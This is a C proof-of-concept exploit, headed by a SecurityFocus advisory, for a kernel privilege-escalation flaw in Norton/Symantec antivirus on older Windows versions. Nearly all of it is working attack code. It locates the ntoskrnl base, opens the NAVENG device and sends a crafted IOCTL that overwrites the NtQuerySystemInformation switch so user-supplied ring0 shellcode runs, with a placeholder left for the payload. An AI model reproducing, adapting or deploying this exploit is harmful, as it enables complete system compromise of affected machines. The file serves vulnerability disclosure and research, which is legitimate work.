/* source: https://www.securityfocus.com/bid/20360/info Symantec AntiVirus is prone to a privilege-escalation vulnerability. Local attackers can exploit this issue to corrupt memory and execute arbitrary code with kernel-level privileges. Successful exploits may facilitate a complete system compromise. This issue affects only Symantec and Norton antivirus products running on Microsoft Windows NT, Windows 2000, and Windows XP. */ //////////////////////////////////// ///// Norton Internet Security //////////////////////////////////// //// For educational purposes ONLY //// //// Kernel Privilege Escalation #1 //// Exploit //// Rub�n Santamarta //// www.reversemode.com //// 26/08/2006 //// //////////////////////////////////// #include #include #define WXP_SWITCH 0xA5522 #define W2K_SWITCH 0x91531 typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*, DWORD , LPDWORD); typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase, LPTSTR lpBaseName, DWORD nSize); VOID ShowError() { LPVOID lpMsgBuf; FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR) &lpMsgBuf, 0, NULL); MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0); exit(1); } int main(int argc, char *argv[]) { DWORD *OutBuff,*InBuff,*ShellAddr; DWORD dwIOCTL,OutSize,InSize,junk,cb,devNum,i,Ring0Addr; HANDLE hDevice; PENUMDEVICES pEnumDeviceDrivers; PGETDEVNAME pGetDeviceDriverBaseName; LPVOID arrMods[200],addEx; DWORD BaseNt=0,BaseAuxNt; BOOL InXP; CHAR baseName[MAX_PATH]; //"PUT YOUR RING0 CODE HERE " unsigned char Ring0ShellCode[]="\xcc\x90\x90\x90"; system("cls"); printf("\n################################\n"); printf("## Norton I.S ##\n"); printf("## Ring0 Exploit ##\n"); printf("################################\n"); printf("\nRuben Santamarta\nwww.reversemode.com\n\n"); if(argc<2) { printf("\nusage> exploit.exe or <2K>\n"); exit(1); } pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"), "EnumDeviceDrivers"); pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"), "GetDeviceDriverBaseNameA"); pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb); devNum=cb/sizeof(LPVOID); printf("\n[!] Searching Ntoskrnl.exe Base Address..."); for(i=0;i<=devNum;i++) { pGetDeviceDriverBaseName(arrMods[i],baseName,MAX_PATH); if((strncmp(baseName,"ntoskr",6)==0)) { printf("[%x] Found!\n",arrMods[i]); BaseNt = (DWORD)arrMods[i]; BaseAuxNt = BaseNt; } } if (!BaseNt) { printf("!!? ntoskrnl.exe base address not found\nexiting\n\n"); exit(0); } ////////////////////// ///// CASE 'DosDevice' ////////////////////// hDevice = CreateFile("\\\\.\\NAVENG", 0, 0, NULL, 3, 0, 0); ////////////////////// ///// INFO ////////////////////// if (hDevice == INVALID_HANDLE_VALUE) ShowError(); printf("\n\n** Initializing Exploit]\n\n"); printf("INFORMATION \n"); printf("-----------------------------------------------------\n"); printf("[!] NAVENG Device Handle [%x]\n",hDevice); ////////////////////// ///// IOCTL ////////////////////// OutSize = 4; dwIOCTL = 0x222AD3; if(strncmp(argv[1],"XP",2)==0) Ring0Addr = BaseNt + WXP_SWITCH; else Ring0Addr = BaseNt + W2K_SWITCH; printf("[!] Overwriting NtQuerySystemInformation Switch at [0x%x]\n",Ring0Addr); ShellAddr=(DWORD*)VirtualAlloc((LPVOID)0x2000000 ,0xF000 ,MEM_COMMIT|MEM_RESERVE ,PAGE_EXECUTE_READWRITE); for(i=1;i<0x3C00;i++) ShellAddr[i]=(DWORD)ShellAddr; // paged out memcpy((LPVOID)ShellAddr,(LPVOID)Ring0ShellCode,sizeof(Ring0ShellCode)); printf("\n\n\t\t[!] Initializing Countdown,last chance to abort."); for(i=10;i>=1;i--) { printf("\r -[ %d ]- ",i); if(i==1) printf("\n\n[*] Executing ShellCode"); Sleep(1000); } DeviceIoControl(hDevice, dwIOCTL, (LPVOID)0,0, (LPVOID)Ring0Addr,OutSize, &junk, NULL); system("dir"); // NtQuerySystemInformation Nasty Hack ; ///////////////////// ///// CLeanUp ///////////////////// CloseHandle(hDevice); free(ShellAddr); printf("\n\n[*] Exploit terminated\n\n"); return 0; }